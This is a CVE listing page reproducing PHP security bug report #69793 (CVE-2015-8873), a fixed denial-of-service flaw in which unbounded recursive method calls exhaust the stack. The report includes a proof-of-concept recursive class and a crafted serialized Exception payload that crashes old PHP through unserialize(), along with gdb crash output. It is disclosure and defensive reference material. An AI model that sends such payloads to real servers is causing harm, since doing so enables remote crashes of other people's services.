Headline

CVE-2015-8873: Remotely triggerable stack exhaustion via recursive method calls

Stack consumption vulnerability in Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to cause a denial of service (segmentation fault) via recursive method calls.

8 years ago

CVE

Open in Source

#vulnerability #ubuntu #dos #git #php

Sec Bug #69793

Remotely triggerable stack exhaustion via recursive method calls

Submitted:

2015-06-10 16:42 UTC

Modified:

2015-08-04 22:20 UTC

From:

andrea dot palazzo at truel dot it

Assigned:

Status:

Closed

Package:

Class/Object related

PHP Version:

Irrelevant

OS:

Ubuntu x86_64

Private report:

CVE-ID:

None

[2015-06-10 16:42 UTC] andrea dot palazzo at truel dot it

Description:

Hello guys, I marked this one as “security” because the crash is remotely triggerable (via unserialize()) so I thought you might not want it public, it doesn’t seem to be exploitable though.

The problem is relies in how recursive method calls are handled, the number of nested calls a method could perform to itself doesn’t seem to be limited, causing an infinite recursion that would result in invalid memory read access due to stack exhaustion.

The POC is trivial:

<?php

Class Dummy{

public function recursion() { $this->recursion(); }

}

$x = new Dummy; $x->recursion();

(gdb) r rec.php Starting program: /usr/bin/php rec.php

Program received signal SIGSEGV, Segmentation fault. zend_do_fcall_common_helper_SPEC (execute_data=<optimized out>) at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h:592 592 in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_vm_execute.h

Unfortunately, this is also triggerable remotely by crafting a special serialized object, also using only built-in classes like:

<?php

$e = unserialize(‘O:9:"Exception":7:{s:17:"’."\0".’Exception’."\0".’string";s:1:"a";s:7:"’."\0".’*’."\0".’code";i:0;s:7:"’."\0".’*’."\0".’file";R:1;s:7:"’."\0".’*’."\0".’line";i:1337;s:16:"’."\0".’Exception’."\0".’trace";a:0:{}s:19:"’."\0".’Exception’."\0".’previous";i:10;s:10:"’."\0".’*’."\0".’message";N;}’);

var_dump($e."");

(gdb) r exception.php Starting program: /usr/bin/php exception.php

Program received signal SIGSEGV, Segmentation fault. zend_parse_va_args (num_args=num_args@entry=0, type_spec=0xb0776b "", va=va@entry=0x7fffff7ff058, flags=flags@entry=0) at /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c:827 827 in /build/php5-U_GrmP/php5-5.6.9+dfsg/Zend/zend_API.c

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2015-08-04 22:22 UTC] [email protected]

-Status: Open +Status: Closed